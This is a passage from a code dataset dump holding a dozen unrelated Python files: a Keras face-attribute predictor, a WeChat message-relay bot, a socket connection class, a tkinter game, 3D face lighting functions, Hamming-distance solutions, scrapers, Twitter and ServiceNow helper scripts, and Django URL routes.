\"\\\\dataset\\\\\"\r\n\r\ndf=pd.read_csv(\"celeb.csv\")\r\ncolumns= [att for att in df.columns[1:]]\r\n\r\n\r\ndef load_model():\r\n json_file = open('model.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n loaded_model = model_from_json(loaded_model_json)\r\n loaded_model.load_weights(\"best_model.h5\")\r\n opt = Adam(lr = 0.0001)\r\n loaded_model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n return loaded_model\r\n\r\nmd_pred = load_model()\r\n\r\n\r\ndef predict(face):\r\n\r\n if face[0][0][0] > 1: face = face / 255.\r\n\r\n prediction = list(md_pred.predict(face.reshape(1, HEIGHT, WIDTH, -1))[0])\r\n prediction = [round(v,2) for v in prediction]\r\n output = [(columns[i] if i !=8 else \"Beard\", str(prediction[i]) if i !=8 else str(round(1 - prediction[i],2))) for i in list(range(len(prediction)))]\r\n m_f = output[6]; del output[6]\r\n m_f = ('M:'+str(m_f[1]),'F:'+str(round(1-float(m_f[1]),2)))\r\n output.insert(0,m_f)\r\n return output\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180174979","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom wxbot import *\n\nclass MyWXBot(WXBot):\n def handle_msg_all(self, msg):\n ''' 群消息 '''\n if msg['msg_type_id'] == 3:\n msg_id = msg['msg_id']\n content = msg['content']\n src_name = content['user']['name']\n uid_test1 = self.get_user_id('test1')\n uid_test2 = self.get_user_id('test2')\n reply = 'from ' + src_name + ': '\n ''' 文本消息 '''\n if content['type'] == 0:\n data = content['data']\n reply = reply + data\n if uid_test1 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test2)\n if uid_test2 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test1)\n ''' 图片消息。动画表情(type=6)支持不好,后期考虑通过转发实现,系统自带动画表情通过图片方式不支持 '''\n if content['type'] == 3:\n self.get_msg_img(msg_id)\n path = 'temp/img_' + msg_id + '.jpg'\n if uid_test1 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test2)\n self.send_img_msg_by_uid(path, uid_test2)\n if uid_test2 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test1)\n self.send_img_msg_by_uid(path, uid_test1)\n ''' 语音消息 '''\n if content['type'] == 4:\n self.get_voice(msg_id)\n path = 'temp/voice_' + msg_id + '.mp3'\n if uid_test1 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test2)\n self.send_file_msg_by_uid(path, uid_test2)\n if uid_test2 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test1)\n self.send_file_msg_by_uid(path, uid_test1)\n ''' 视频消息 '''\n if content['type'] == 13:\n self.get_video(msg_id)\n path = 'temp/video_' + msg_id + '.mp4'\n if uid_test1 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test2)\n self.send_file_msg_by_uid(path, uid_test2)\n if uid_test2 == msg['user']['id']:\n self.send_msg_by_uid(reply, uid_test1)\n self.send_file_msg_by_uid(path, uid_test1)\n def schedule(self):\n self.send_msg(u'陈晓宇', 'keepalive')\n time.sleep(1800)\n\ndef main():\n bot = MyWXBot()\n bot.DEBUG = True\n bot.conf['qr'] = 'tty'\n bot.is_big_contact = False #如果确定通讯录过大,无法获取,可以直接配置,跳过检查。假如不是过大的话,这个方法可能无法获取所有的联系人\n bot.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455047859","text":"from src.model.connection import Connection\n# from src.model.utils.observable import Observable\nfrom src.model.utils.observer import Observer\n\nimport socket as s\nfrom select import select\nfrom threading import Thread, Lock\nfrom typing import Set, Sequence, List, Tuple\nfrom time import sleep\n\n\nclass TCPIPConnection(Connection, Thread):\n def __init__(self, inbound_port=8888):\n Connection.__init__(self)\n Thread.__init__(self)\n self.__observers: Set[Observer] = set()\n self.__inbound_port = inbound_port\n\n self.__set_up_listen_socket()\n self.__connected = False\n self.__connecting = False\n self.__connection_waiting = False\n self.__host = None # type: s.socket\n self.__addr = None\n\n self.__lock = Lock()\n self.__running = False\n self.__state_changed = False\n\n self.__recv_buffer = bytearray()\n\n def __set_up_listen_socket(self):\n self.__listen_socket = s.socket()\n self.__listen_socket.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)\n self.__listen_socket.bind(('0.0.0.0', self.__inbound_port))\n self.__listen_socket.listen(1)\n self.__listening = True\n\n def open(self, host: str, port: int) -> None:\n self.__host = s.socket()\n self.__host.connect((host, port))\n self.__listen_socket.close()\n self.__listen_socket = None # type: s.socket\n self.__listening = False\n self.__connecting = True\n\n def close(self) -> None:\n self.__connected = False\n self.__connecting = False\n self.__host.close()\n self.__host = None # type: s.socket\n self.__addr = None\n self.__set_up_listen_socket()\n self.__listening = True\n\n def send_data(self, data: bytes) -> None:\n self.__host.send(data)\n\n def recv_data(self) -> bytearray:\n ret = self.__recv_buffer.copy()\n self.__recv_buffer.clear()\n return ret\n\n def accept_connection(self) -> None:\n self.__host.send(b'123')\n self.__connecting = False\n self.__listening = False\n self.__connection_waiting = False\n self.__connected = True\n\n def decline_connection(self) -> None:\n self.close()\n self.__connection_waiting = False\n\n def is_open(self) -> bool:\n return self.__connected\n\n def readable(self) -> bool:\n return len(self.__recv_buffer) != 0\n\n def has_incoming_connection(self) -> bool:\n return self.__connection_waiting\n\n def get_incoming_connection_address(self) -> Tuple[str, int]:\n return self.__addr\n\n def register_observer(self, observer: Observer) -> None:\n self.__lock.acquire()\n self.__observers.add(observer)\n self.__lock.release()\n\n def remove_observer(self, observer: Observer) -> None:\n self.__lock.acquire()\n self.__observers.remove(observer)\n self.__lock.release()\n\n def notify_observers(self) -> None:\n for o in self.__observers:\n o.update()\n self.__state_changed = False\n\n def run(self) -> None:\n self.__running = True\n\n while self.__running:\n self.__lock.acquire()\n if self.__listening:\n self.__handle_listening()\n elif self.__connected:\n self.__handle_connected()\n elif self.__connecting:\n self.__handle_connecting()\n\n if self.__state_changed:\n self.notify_observers()\n\n self.__lock.release()\n\n sleep(0.05)\n\n if self.__host is not None:\n self.__host.close()\n if self.__listen_socket is not None:\n self.__listen_socket.close()\n\n def lock(self) -> None:\n self.__lock.acquire()\n\n def unlock(self) -> None:\n self.__lock.release()\n\n def stop(self) -> None:\n self.__running = False\n\n def __handle_listening(self) -> None:\n readable = self.__get_readable([self.__listen_socket])\n if readable:\n self.__host, self.__addr = self.__listen_socket.accept()\n self.__listen_socket.close()\n self.__listen_socket = None # type: s.socket\n self.__listening = False\n self.__connection_waiting = True\n self.__state_changed = True\n\n def __handle_connected(self) -> None:\n readable = self.__get_readable([self.__host])\n while readable:\n self.__state_changed = True\n data = self.__host.recv(1024)\n if not data:\n\n self.close()\n break\n\n self.__recv_buffer += data\n readable = self.__get_readable([self.__host])\n\n def __handle_connecting(self) -> None:\n readable = self.__get_readable([self.__host])\n if readable:\n response = self.__host.recv(100)\n if not response:\n self.__host.close()\n self.__host = None # type: s.socket\n self.__addr = None\n self.__set_up_listen_socket()\n else:\n self.__connecting = False\n self.__connected = True\n self.__state_changed = True\n\n def __get_readable(self, sockets: Sequence[s.socket]) -> List[s.socket]:\n return select(sockets, [], [], 0.0)[0]\n","sub_path":"src/model/tcpip_connection.py","file_name":"tcpip_connection.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637553404","text":"import tkinter\nimport keyboard\nimport time\n\ndef controllers(canvas, character):\n if keyboard.is_pressed('space') and character.hasJumped != True and character.onGround(canvas) == True:\n print(\"JUMPING\")\n character.hasJumped = True\n character.Yspeed = 20\n elif not keyboard.is_pressed('space') or character.onGround(canvas) == True:\n character.hasJumped = False\n\nclass Tk_Canvas():\n def __init__(self, width, height, background, clockSpeed):\n self.ground = 0\n self.width = width\n self.height = height\n self.background = background\n self.root = tkinter.Tk()\n self.clockSpeed = clockSpeed\n self.timeDelta = 1./clockSpeed\n self.canvas = tkinter.Canvas(self.root, width = self.width, height = self.height, background = self.background)\n self.canvas.pack()\n def update(self):\n self.canvas.update_idletasks()\n self.canvas.update()\n def create_rectangle(self, x0, y0, x1, y1, fill):\n return self.canvas.create_rectangle(x0, self.height - y0, x1, self.height - y1, fill = fill)\n\nclass Main():\n def __init__(self, meterDefinition, speed, gravity, color, canvas):\n self.hasJumped = False\n self.gravity = -gravity\n self.meterDefinition = meterDefinition\n self.Xspeed = speed\n self.Yspeed = 0\n self.color = color\n self.x = 0\n self.y = 10\n self.body = canvas.create_rectangle(125, self.y+50, 175, self.y, self.color)\n def move(self, canvas):\n self.x += self.Xspeed * self.meterDefinition/canvas.clockSpeed\n self.y += self.Yspeed * self.meterDefinition/canvas.clockSpeed\n self.Yspeed += self.gravity\n self.onGround(canvas)\n def update(self, canvas):\n canvas.canvas.delete(self.body)\n self.body = canvas.create_rectangle(125, self.y+50, 175, self.y, self.color)\n def onGround(self, canvas):\n if self.y <= canvas.ground:\n self.y = canvas.ground\n self.Yspeed = 0\n return True\n\ncanvas = Tk_Canvas(1280, 720, '#162838', 60)\ncharacter = Main(100, 10, 1.6, '#2E8781', canvas)\n\nwhile True:\n time.sleep(canvas.timeDelta)\n\n controllers(canvas, character)\n character.move(canvas)\n character.update(canvas)\n canvas.update()\n\n\"\"\"\"\"\n\nTo do:\n- Connectar-se a discord F\n\nBueno, ves familiaritzant-te amb el programa, ara que hi ha poca cosa escrita xDD\n\n\"\"\"\"\"","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423648484","text":"'''\nFunctions about lighting mesh(changing colors/texture of mesh).\n1. add light to colors/texture (shade each vertex)\n2. fit light according to colors/texture & image.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom .cython import mesh_core_cython\n\ndef get_normal(vertices, triangles):\n ''' calculate normal direction in each vertex\n Args:\n vertices: [nver, 3]\n triangles: [ntri, 3]\n Returns:\n normal: [nver, 3]\n '''\n pt0 = vertices[triangles[:, 0], :] # [ntri, 3]\n pt1 = vertices[triangles[:, 1], :] # [ntri, 3]\n pt2 = vertices[triangles[:, 2], :] # [ntri, 3]\n tri_normal = np.cross(pt0 - pt1, pt0 - pt2) # [ntri, 3]. normal of each triangle\n\n normal = np.zeros_like(vertices, dtype = np.float32).copy() # [nver, 3]\n # for i in range(triangles.shape[0]):\n # normal[triangles[i, 0], :] = normal[triangles[i, 0], :] + tri_normal[i, :]\n # normal[triangles[i, 1], :] = normal[triangles[i, 1], :] + tri_normal[i, :]\n # normal[triangles[i, 2], :] = normal[triangles[i, 2], :] + tri_normal[i, :]\n mesh_core_cython.get_normal_core(normal, tri_normal.astype(np.float32).copy(), triangles.copy(), triangles.shape[0])\n\n # normalize to unit length\n mag = np.sum(normal**2, 1) # [nver]\n zero_ind = (mag == 0)\n mag[zero_ind] = 1;\n normal[zero_ind, 0] = np.ones((np.sum(zero_ind)))\n\n normal = normal/np.sqrt(mag[:,np.newaxis])\n\n return normal\n\n# TODO: test\ndef add_light_sh(vertices, triangles, colors, sh_coeff):\n ''' \n In 3d face, usually assume:\n 1. The surface of face is Lambertian(reflect only the low frequencies of lighting)\n 2. Lighting can be an arbitrary combination of point sources\n --> can be expressed in terms of spherical harmonics(omit the lighting coefficients)\n I = albedo * (sh(n) x sh_coeff)\n \n albedo: n x 1\n sh_coeff: 9 x 1\n Y(n) = (1, n_x, n_y, n_z, n_xn_y, n_xn_z, n_yn_z, n_x^2 - n_y^2, 3n_z^2 - 1)': n x 9 \n # Y(n) = (1, n_x, n_y, n_z)': n x 4\n\n Args:\n vertices: [nver, 3]\n triangles: [ntri, 3]\n colors: [nver, 3] albedo\n sh_coeff: [9, 1] spherical harmonics coefficients\n\n Returns:\n lit_colors: [nver, 3]\n '''\n assert vertices.shape[0] == colors.shape[0]\n nver = vertices.shape[0]\n normal = get_normal(vertices, triangles) # [nver, 3]\n sh = np.array((np.ones(nver), n[:,0], n[:,1], n[:,2], n[:,0]*n[:,1], n[:,0]*n[:,2], n[:,1]*n[:,2], n[:,0]**2 - n[:,1]**2, 3*(n[:,2]**2) - 1)) # [nver, 9]\n ref = sh.dot(sh_coeff) #[nver, 1]\n lit_colors = colors*ref\n return lit_colors\n\n\ndef add_light(vertices, triangles, colors, light_positions = 0, light_intensities = 0):\n ''' Gouraud shading. add point lights.\n In 3d face, usually assume:\n 1. The surface of face is Lambertian(reflect only the low frequencies of lighting)\n 2. Lighting can be an arbitrary combination of point sources\n 3. No specular (unless skin is oil, 23333)\n\n Ref: https://cs184.eecs.berkeley.edu/lecture/pipeline \n Args:\n vertices: [nver, 3]\n triangles: [ntri, 3]\n light_positions: [nlight, 3] \n light_intensities: [nlight, 3]\n Returns:\n lit_colors: [nver, 3]\n '''\n nver = vertices.shape[0]\n normals = get_normal(vertices, triangles) # [nver, 3]\n\n # ambient\n # La = ka*Ia\n\n # diffuse\n # Ld = kd*(I/r^2)max(0, nxl)\n direction_to_lights = vertices[np.newaxis, :, :] - light_positions[:, np.newaxis, :] # [nlight, nver, 3]\n direction_to_lights_n = np.sqrt(np.sum(direction_to_lights**2, axis = 2)) # [nlight, nver]\n direction_to_lights = direction_to_lights/direction_to_lights_n[:, :, np.newaxis]\n normals_dot_lights = normals[np.newaxis, :, :]*direction_to_lights # [nlight, nver, 3]\n normals_dot_lights = np.sum(normals_dot_lights, axis = 2) # [nlight, nver]\n diffuse_output = colors[np.newaxis, :, :]*normals_dot_lights[:, :, np.newaxis]*light_intensities[:, np.newaxis, :]\n diffuse_output = np.sum(diffuse_output, axis = 0) # [nver, 3]\n \n # specular\n # h = (v + l)/(|v + l|) bisector\n # Ls = ks*(I/r^2)max(0, nxh)^p\n # increasing p narrows the reflectionlob\n\n lit_colors = diffuse_output # only diffuse part here.\n lit_colors = np.minimum(np.maximum(lit_colors, 0), 1)\n return lit_colors\n\n\n\n## TODO. estimate light(sh coeff)\n## -------------------------------- estimate. can not use now. \ndef fit_light(image, vertices, colors, triangles, vis_ind, lamb = 10, max_iter = 3):\n [h, w, c] = image.shape\n\n # surface normal\n norm = get_normal(vertices, triangles)\n \n nver = vertices.shape[1]\n\n # vertices --> corresponding image pixel\n pt2d = vertices[:2, :]\n\n pt2d[0,:] = np.minimum(np.maximum(pt2d[0,:], 0), w - 1)\n pt2d[1,:] = np.minimum(np.maximum(pt2d[1,:], 0), h - 1)\n pt2d = np.round(pt2d).astype(np.int32) # 2 x nver\n\n image_pixel = image[pt2d[1,:], pt2d[0,:], :] # nver x 3\n image_pixel = image_pixel.T # 3 x nver\n\n # vertices --> corresponding mean texture pixel with illumination\n # Spherical Harmonic Basis\n harmonic_dim = 9\n nx = norm[0,:];\n ny = norm[1,:];\n nz = norm[2,:];\n harmonic = np.zeros((nver, harmonic_dim))\n\n pi = np.pi\n harmonic[:,0] = np.sqrt(1/(4*pi)) * np.ones((nver,));\n harmonic[:,1] = np.sqrt(3/(4*pi)) * nx;\n harmonic[:,2] = np.sqrt(3/(4*pi)) * ny;\n harmonic[:,3] = np.sqrt(3/(4*pi)) * nz;\n harmonic[:,4] = 1/2. * np.sqrt(3/(4*pi)) * (2*nz**2 - nx**2 - ny**2);\n harmonic[:,5] = 3 * np.sqrt(5/(12*pi)) * (ny*nz);\n harmonic[:,6] = 3 * np.sqrt(5/(12*pi)) * (nx*nz);\n harmonic[:,7] = 3 * np.sqrt(5/(12*pi)) * (nx*ny);\n harmonic[:,8] = 3/2. * np.sqrt(5/(12*pi)) * (nx*nx - ny*ny);\n \n '''\n I' = sum(albedo * lj * hj) j = 0:9 (albedo = tex)\n set A = albedo*h (n x 9)\n alpha = lj (9 x 1)\n Y = I (n x 1)\n Y' = A.dot(alpha)\n\n opt function:\n ||Y - A*alpha|| + lambda*(alpha'*alpha)\n result:\n A'*(Y - A*alpha) + lambda*alpha = 0\n ==>\n (A'*A*alpha - lambda)*alpha = A'*Y\n left: 9 x 9\n right: 9 x 1\n '''\n n_vis_ind = len(vis_ind)\n n = n_vis_ind*c\n\n Y = np.zeros((n, 1))\n A = np.zeros((n, 9))\n light = np.zeros((3, 1))\n\n for k in range(c):\n Y[k*n_vis_ind:(k+1)*n_vis_ind, :] = image_pixel[k, vis_ind][:, np.newaxis]\n A[k*n_vis_ind:(k+1)*n_vis_ind, :] = texture[k, vis_ind][:, np.newaxis] * harmonic[vis_ind, :]\n Ac = texture[k, vis_ind][:, np.newaxis]\n Yc = image_pixel[k, vis_ind][:, np.newaxis]\n light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))\n\n for i in range(max_iter):\n\n Yc = Y.copy()\n for k in range(c):\n Yc[k*n_vis_ind:(k+1)*n_vis_ind, :] /= light[k]\n\n # update alpha\n equation_left = np.dot(A.T, A) + lamb*np.eye(harmonic_dim); # why + ?\n equation_right = np.dot(A.T, Yc) \n alpha = np.dot(np.linalg.inv(equation_left), equation_right)\n\n # update light\n for k in range(c):\n Ac = A[k*n_vis_ind:(k+1)*n_vis_ind, :].dot(alpha)\n Yc = Y[k*n_vis_ind:(k+1)*n_vis_ind, :]\n light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))\n\n appearance = np.zeros_like(texture)\n for k in range(c):\n tmp = np.dot(harmonic*texture[k, :][:, np.newaxis], alpha*light[k])\n appearance[k,:] = tmp.T\n\n appearance = np.minimum(np.maximum(appearance, 0), 1)\n\n return appearance\n\n","sub_path":"python-package/insightface/thirdparty/face3d/mesh/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286487356","text":"\"\"\"\nThe Hamming distance between two integers is the number of positions at which the\ncorresponding bits are different.\n\nNow your job is to find the total Hamming distance between all pairs of the given numbers.\n\"\"\"\nclass Solution(object):\n def totalHammingDistance(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # TLE. Naive solution\n if len(nums) == 2:\n return self.hammingDistance(nums[0], nums[1])\n\n dist = 0\n for i in range(len(nums)-1):\n for j in range(i+1, len(nums)):\n if nums[i] != nums[j]:\n dist += self.hammingDistance(nums[i], nums[j])\n return dist\n\n def hammingDistance(self, x, y):\n z = x ^ y\n res = 0\n while z > 0:\n res += z % 2\n z >>= 1\n return res\n\n def totalHammingDistance2(self, nums):\n if len(nums) < 2: return 0\n res = 0\n while True:\n zeroOne = [0, 0]\n for i in range(len(nums)):\n zeroOne[nums[i] % 2] += 1\n nums[i] = nums[i] >> 1\n res += zeroOne[0] * zeroOne[1]\n if not any(nums):\n return res\n\n def totalHammingDistance3(self, nums):\n \"\"\"\n Total hamming distance for the i-th bit =\n (the number of zeros in the i-th position) *\n (the number of ones in the i-th position).\n \"\"\"\n bits = [[0, 0] for _ in range(32)]\n for x in nums:\n for i in range(32):\n bits[i][x % 2] += 1\n x //= 2\n return sum(x * y for x, y in bits)\n\n# nums = [4,14,2]\n# nums = [1337,7331]\nnums = [6,1,8,6,8] # 22\nprint(Solution().totalHammingDistance3(nums))\n\n\"\"\"\nThe total Hamming distance is constructed bit by bit in this approach.\n\nLet's take a series of number: a1, a2, a3,..., an\nJust think about all the Least Significant Bit (LSB) of a(k) (1 ≤ k ≤ n).\n\nHow many Hamming distance will they bring to the total?\nIf a pair of number has same LSB, the total distance will get 0.\nIf a pair of number has different LSB, the total distance will get 1.\n\nFor all number a1, a2, a3,..., a(n), if there are p numbers have 0 as LSB (put in set M), and q numbers have 1 for LSB (put in set N).\n\nThere are 2 situations:\nSituation 1. If the 2 number in a pair both comes from M (or N), the total will get 0.\nSituation 2. If the 1 number in a pair comes from M, the other comes from N, the total will get 1.\n\nSince Situation 1 will add NOTHING to the total, we only need to think about Situation 2\n\nHow many pairs are there in Situation 2?\nWe choose 1 number from M (p possibilities), and 1 number from N (q possibilities).\n\nThe total possibilities is p × q = pq, which means\nThe total Hamming distance will get pq from LSB.\n\nIf we remove the LSB of all numbers (right logical shift), the same idea can be used again and again until all numbers becomes zero\n\"\"\"","sub_path":"477TotalHammingDist.py","file_name":"477TotalHammingDist.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259821934","text":"from cryptography.fernet import Fernet\nfrom pymongo import MongoClient\n\n#---------------------------Encriptar-----------------------------------\ndef encriptar(message):\n file = open('key.key','rb')\n key = file.read()\n file.close()\n\n encoded = message.encode()\n\n f = Fernet(key)\n encrypted = f.encrypt(encoded)\n\n return encrypted\n#------------------Desencriptar-------------------------\ndef desencriptarContra(usuario):\n \n tipoCuenta = []\n client = MongoClient()\n db = client['Diem']\n usuarios = db.Usuarios\n result = usuarios.find({\n 'Nombre del usuario': usuario\n })\n \n if not(type(result) == None):\n for i in result:\n m = i['Contraseña']\n tipoCuenta.append(i['Administrador'])\n file = open('key.key','rb')\n key2 = file.read()\n file.close()\n f2 = Fernet(key2)\n m = m.encode()\n decrypted = f2.decrypt(m).decode() \n return decrypted, bool(tipoCuenta[0])\n#------------------------Verificar---------------------------- ----\n\ndef verificar(usuario,contra):\n entrar = False\n res,tipoCuenta = desencriptarContra(usuario)\n if contra == res :\n entrar = True\n return entrar, tipoCuenta\n else:\n return entrar, tipoCuenta\n \n","sub_path":"Utiles/Verificar.py","file_name":"Verificar.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221362055","text":"from pupa.scrape import Jurisdiction, Scraper, Legislator\nfrom larvae.organization import Organization\n\n\nclass Example(Jurisdiction):\n jurisdiction_id = 'ex'\n\n def get_metadata(self):\n return {'name': 'Example',\n 'legislature_name': 'Example Legislature',\n 'legislature_url': 'http://example.com',\n 'terms': [{'name': '2013-2014', 'sessions': ['2013'],\n 'start_year': 2013, 'end_year': 2014\n }],\n 'provides': ['people'],\n 'parties': [{'name': 'Independent' },\n {'name': 'Green' },\n {'name': 'Bull-Moose'}\n ],\n 'session_details': {'2013': {'_scraped_name': '2013'}},\n 'feature_flags': [],\n }\n\n def get_scraper(self, term, session, scraper_type):\n if scraper_type == 'people':\n return ExamplePersonScraper\n\n def scrape_session_list(self):\n return ['2013']\n\n\nclass ExamplePersonScraper(Scraper):\n\n def get_people(self):\n # committee\n tech = Organization('Technology', classification='committee')\n tech.add_post('Chairman', 'chairman')\n yield tech\n\n # subcommittee\n ecom = Organization('Subcommittee on E-Commerce',\n parent=tech,\n classification='committee')\n yield ecom\n\n p = Legislator('Paul Tagliamonte', district='6', chamber='upper',\n party='Independent')\n p.add_committee_membership('Finance')\n p.add_membership(tech, role='chairman')\n yield p\n","sub_path":"example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492622694","text":"\"\"\"\nThis plots the mean ionisation fraction _inside_ the Hii region.\n\nCreated by: Josh Borrow\nCreated on: 7th February 2018\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom astropy.table import Table\nfrom helper import *\n\n# Global variable that thells you where the files are.\nlocations = (\"../temp_var_lowdensity\", \"../temp_var_highdensity\")\nlabels = (\"$n_h = 10^1$ cm$^{-3}$\", \"$n_h = 10^3$ cm$^{-3}$\")\n\nfig, (ax) = plt.subplots(1, 1)\n\nfor location, label in zip(locations, labels):\n cloud = []\n star = []\n\n\n for number in range(1, 11):\n density = 10\n temperature = number * 1e4\n\n ovw = Table.read(f\"{location}/{int(temperature)}/hii_coolstar.ovr\", format=\"ascii\")\n\n edge_of_region = find_turning_point(ovw, \"HII\")\n temp = np.mean(ovw[\"HII\"][ovw[\"depth\"] < edge_of_region])\n \n cloud.append(temp)\n star.append(temperature)\n\n\n ax.plot(star, cloud, label=label)\n\n\nax.set_xlabel(\"Stellar temperature (K)\")\nax.set_ylabel(\"Ionised fraction\")\n\nax.legend()\n\nplt.savefig(\"cloud_ion.pdf\")\n\n","sub_path":"analysis/plot_mean_ionisation.py","file_name":"plot_mean_ionisation.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262464422","text":"import sys\n\nimport toml\n\nfrom my_dataclasses import AuthInfo, Secrets\n\n\nclass ConfigFromToml(object):\n def __init__(self, secrets: Secrets) -> None:\n self.api_key = secrets.api_key\n self.api_secret = secrets.api_secret\n self.access_token = secrets.access_token\n self.access_token_secret = secrets.access_token_secret\n self.resource_url = secrets.resource_url\n\n def _view_tokens(self):\n print(\"=\" * 50)\n print(f\"api_key is {self.api_key}\")\n print(f\"api_secret is {self.api_secret}\")\n print(f\"access_token is {self.access_token}\")\n print(f\"access_token_secret is {self.access_token_secret}\")\n\n\nclass ConfigForUseTwitterAPI(ConfigFromToml):\n def __init__(self, secrets: Secrets,) -> None:\n self.api_key = secrets.api_key\n self.api_secret = secrets.api_secret\n self.access_token = secrets.access_token\n self.access_token_secret = secrets.access_token_secret\n self.resource_url = secrets.resource_url\n\n def _api_auth_info(self):\n api_auth_info = AuthInfo(\n api_key=self.api_key,\n api_secret=self.api_secret,\n access_token=self.access_token,\n access_token_secret=self.access_token_secret,\n resource_url=self.resource_url,\n )\n return api_auth_info\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n\n secrets = Secrets(\n webhook_url=\"{}\".format(args[1]),\n api_key=\"{}\".format(args[2]),\n api_secret=\"{}\".format(args[3]),\n access_token=\"{}\".format(args[4]),\n access_token_secret=\"{}\".format(args[5]),\n resource_url=\"https://api.twitter.com/1.1/statuses/user_timeline.json\",\n )\n\n config_from_toml = ConfigFromToml(secrets)\n config_from_toml._view_tokens()\n\n config_for_use_twitter_api = ConfigForUseTwitterAPI(secrets)\n api_auth_info = config_for_use_twitter_api._api_auth_info()\n print(api_auth_info)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"584933060","text":"import tfe2_pipeline_wrapper.lib.ServiceNowCalls as SNOW\nimport click\nimport json\n\n\n@click.command()\n@click.option('--action_type', required=True)\n@click.option('--configuration_file', required=True)\n@click.option('--log_file', required=True)\n@click.option('--sys_id', required=False)\ndef main(action_type, configuration_file, log_file, sys_id=None):\n # Open Files\n with open(configuration_file) as config_file:\n config = json.load(config_file)\n with open(log_file, \"r\", encoding=\"utf-8\") as log_file:\n log = log_file.read()\n\n # Open or Close a change\n results = {}\n if action_type == \"plan\":\n results = SNOW.raise_servicenow_change(configuration_data=config, plan_log=log)\n elif action_type == \"apply\":\n results = SNOW.close_servicenow_change(configuration_data=config, sys_id=sys_id, apply_results=log)\n else:\n print(\"Invalid Action Type\")\n\n # Write run results to file\n with open('change_results.json', \"w\", encoding=\"utf-8\") as outfile:\n outfile.write(json.dumps(results))\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tfe2_pipeline_wrapper/servicenow_change.py","file_name":"servicenow_change.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432652005","text":"from django.urls import path\n\nfrom .views import ArticleListView, ArticleDetailView, ArticleUpdateView, ArticleDeleteView, ArticleCreateView\n\nurlpatterns = [\n path('/', ArticleDetailView.as_view(), name='articleDetailUrl'),\n path('/edit/', ArticleUpdateView.as_view(), name='articleUpdateUrl'),\n path('/delete/', ArticleDeleteView.as_view(), name='articleDeleteUrl'),\n path('new/', ArticleCreateView.as_view(), name='articleNewUrl'),\n path('', ArticleListView.as_view(), name='articleListUrl'),\n]","sub_path":"william_newspaper/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171800704","text":"import twitter\nimport json\nimport csv\nimport time\nimport pre_processor as pp\nimport nltk\n\n\ndef twitter_connection():\n with open('credentials.json') as f:\n credentials = json.load(f)\n\n twitter_api = twitter.Api(consumer_key=credentials['consumer_key'],\n consumer_secret=credentials['consumer_secret'],\n access_token_key=credentials['access_token_key'],\n access_token_secret=credentials['access_token_secret'])\n\n return twitter_api\n\n\ndef build_test_set(twitter_api, search_keyword):\n try:\n test_tweets = twitter_api.GetSearch(search_keyword, count=10)\n print(len(test_tweets), \"tweets have been fetched from twitter to build the testing set\")\n return [{\"text\": status.text, \"label\": None} for status in test_tweets]\n except Exception as e:\n print(\"Oops something went wrong. Try again later\", e)\n\n\ndef fetch_tweets_by_id(tweets_ids):\n tweets_limit = 180\n fetching_window = 15*60\n train_tweets = []\n\n for tweet in tweets_ids:\n try:\n status = twitter_api.GetStatus(tweet['tweetId'])\n tweet['text'] = status.text\n train_tweets.append(tweet)\n print(\"tweet fetched\", tweet['tweetId'])\n time.sleep(fetching_window/tweets_limit)\n except Exception as e:\n print(tweet['tweetId'], e)\n continue\n\n print(\"We have fetched\", len(train_tweets), \"tweets for the trainning set\")\n return train_tweets\n\n\ndef write_csv_output(train_tweets):\n with open('training_set.csv', 'w') as csv_output:\n csv_writer = csv.writer(csv_output, delimiter=',', quotechar=\"\\\"\")\n for tweet in 